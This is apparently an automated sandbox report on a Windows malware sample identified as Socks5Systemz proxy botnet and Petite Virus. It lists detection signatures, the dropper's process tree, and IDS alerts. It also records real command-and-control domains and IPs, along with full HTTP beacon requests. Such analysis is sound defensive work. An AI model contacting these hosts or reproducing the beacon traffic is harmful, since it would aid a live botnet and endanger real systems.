Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KRdh0OaXqH.exe

Overview

General Information

Sample name:KRdh0OaXqH.exe
renamed because original name is a hash value
Original sample name:61ab9f06b48b8df40ce15ce9252c0531.exe
Analysis ID:1575229
MD5:61ab9f06b48b8df40ce15ce9252c0531
SHA1:02d1610e771bea84c27aafd05df21dcb300420e5
SHA256:732bccaeb50d50526b5f6c8817ce889d04fb7b67a52b88f79e223d4cf9b807ae
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

Petite Virus, Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Petite Virus
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
PE file has nameless sections
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • KRdh0OaXqH.exe (PID: 4512 cmdline: "C:\Users\user\Desktop\KRdh0OaXqH.exe" MD5: 61AB9F06B48B8DF40CE15CE9252C0531)
    • KRdh0OaXqH.tmp (PID: 2828 cmdline: "C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp" /SL5="$10440,6991381,54272,C:\Users\user\Desktop\KRdh0OaXqH.exe" MD5: F448D7F4B76E5C9C3A4EAFF16A8B9B73)
      • schtasks.exe (PID: 4816 cmdline: "C:\Windows\system32\schtasks.exe" /Query MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crtgame.exe (PID: 2276 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -i MD5: BB0124F16D88C4EC1FCFD9E524A5B921)
      • net.exe (PID: 3576 cmdline: "C:\Windows\system32\net.exe" helpmsg 10 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 6516 cmdline: C:\Windows\system32\net1 helpmsg 10 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • crtgame.exe (PID: 5884 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -s MD5: BB0124F16D88C4EC1FCFD9E524A5B921)
  • cleanup
{"C2 list": ["goeiwef.com"]}
SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\CRTGame\bin\x86\is-SG9N2.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
    C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
      C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
        C:\Program Files (x86)\CRTGame\bin\x86\is-V3CB3.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
          C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
              00000007.00000002.3291926333.0000000000A25000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                Process Memory Space: crtgame.exe PID: 5884JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T20:08:04.972631+010020494671A Network Trojan was detected192.168.2.54978894.232.249.18780TCP
                  2024-12-14T20:08:18.112716+010020494671A Network Trojan was detected192.168.2.54981894.232.249.18780TCP
                  2024-12-14T20:08:31.253208+010020494671A Network Trojan was detected192.168.2.54984894.232.249.18780TCP
                  2024-12-14T20:08:50.004899+010020494671A Network Trojan was detected192.168.2.549904185.237.206.12980TCP
                  2024-12-14T20:08:53.823630+010020494671A Network Trojan was detected192.168.2.549904185.237.206.12980TCP
                  2024-12-14T20:08:55.343124+010020494671A Network Trojan was detected192.168.2.549920185.237.206.12980TCP
                  2024-12-14T20:08:56.958667+010020494671A Network Trojan was detected192.168.2.549923185.237.206.12980TCP
                  2024-12-14T20:08:58.465548+010020494671A Network Trojan was detected192.168.2.549929185.237.206.12980TCP
                  2024-12-14T20:08:59.978702+010020494671A Network Trojan was detected192.168.2.549934185.237.206.12980TCP
                  2024-12-14T20:09:01.494245+010020494671A Network Trojan was detected192.168.2.549936185.237.206.12980TCP
                  2024-12-14T20:09:03.069320+010020494671A Network Trojan was detected192.168.2.549942185.237.206.12980TCP
                  2024-12-14T20:09:04.592642+010020494671A Network Trojan was detected192.168.2.549947185.237.206.12980TCP
                  2024-12-14T20:09:06.109041+010020494671A Network Trojan was detected192.168.2.549953185.237.206.12980TCP
                  2024-12-14T20:09:07.633464+010020494671A Network Trojan was detected192.168.2.549955185.237.206.12980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T20:08:04.972631+010020494681A Network Trojan was detected192.168.2.54978894.232.249.18780TCP
                  2024-12-14T20:08:18.112716+010020494681A Network Trojan was detected192.168.2.54981894.232.249.18780TCP
                  2024-12-14T20:08:31.253208+010020494681A Network Trojan was detected192.168.2.54984894.232.249.18780TCP
                  2024-12-14T20:08:50.004899+010020494681A Network Trojan was detected192.168.2.549904185.237.206.12980TCP
                  2024-12-14T20:08:53.823630+010020494681A Network Trojan was detected192.168.2.549904185.237.206.12980TCP
                  2024-12-14T20:08:55.343124+010020494681A Network Trojan was detected192.168.2.549920185.237.206.12980TCP
                  2024-12-14T20:08:56.958667+010020494681A Network Trojan was detected192.168.2.549923185.237.206.12980TCP
                  2024-12-14T20:08:58.465548+010020494681A Network Trojan was detected192.168.2.549929185.237.206.12980TCP
                  2024-12-14T20:08:59.978702+010020494681A Network Trojan was detected192.168.2.549934185.237.206.12980TCP
                  2024-12-14T20:09:01.494245+010020494681A Network Trojan was detected192.168.2.549936185.237.206.12980TCP
                  2024-12-14T20:09:03.069320+010020494681A Network Trojan was detected192.168.2.549942185.237.206.12980TCP
                  2024-12-14T20:09:04.592642+010020494681A Network Trojan was detected192.168.2.549947185.237.206.12980TCP
                  2024-12-14T20:09:06.109041+010020494681A Network Trojan was detected192.168.2.549953185.237.206.12980TCP
                  2024-12-14T20:09:07.633464+010020494681A Network Trojan was detected192.168.2.549955185.237.206.12980TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: KRdh0OaXqH.exeAvira: detected
                  Source: crtgame.exe.5884.7.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["goeiwef.com"]}
                  Source: KRdh0OaXqH.exeReversingLabs: Detection: 55%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0045C8A8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045C8A8
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0045C95C ArcFourCrypt,1_2_0045C95C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0045C974 ArcFourCrypt,1_2_0045C974
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                  Compliance

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 5.2.crtgame.exe.400000.0.unpack
                  Source: KRdh0OaXqH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-AE6QK.tmp.1.dr
                  Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-BUF5F.tmp.1.dr
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49818 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49818 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49788 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49788 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49923 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49923 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49848 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49848 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49934 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49934 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49947 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49947 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49955 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49955 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49904 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49904 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49936 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49936 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49953 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49953 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49920 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49920 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49929 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49929 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49942 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49942 -> 185.237.206.129:80
                  Source: Malware configuration extractorURLs: goeiwef.com
                  Source: global trafficTCP traffic: 192.168.2.5:49909 -> 46.8.225.74:2023
                  Source: Joe Sandbox ViewASN Name: INT-PDN-STE-ASSTEPDNInternalASSY INT-PDN-STE-ASSTEPDNInternalASSY
                  Source: Joe Sandbox ViewASN Name: ITLDC-NLUA ITLDC-NLUA
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1Host: ayptoht.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1Host: ayptoht.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1Host: ayptoht.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownUDP traffic detected without corresponding DNS query: 81.31.197.38
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 152.89.198.214
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A32B95 WSASetLastError,WSARecv,WSASetLastError,select,7_2_02A32B95
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1Host: ayptoht.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1Host: ayptoht.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1Host: ayptoht.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1Host: goeiwef.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficDNS traffic detected: DNS query: ayptoht.ru
                  Source: global trafficDNS traffic detected: DNS query: goeiwef.com
                  Source: crtgame.exe, 00000007.00000002.3291501599.0000000000988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.129/
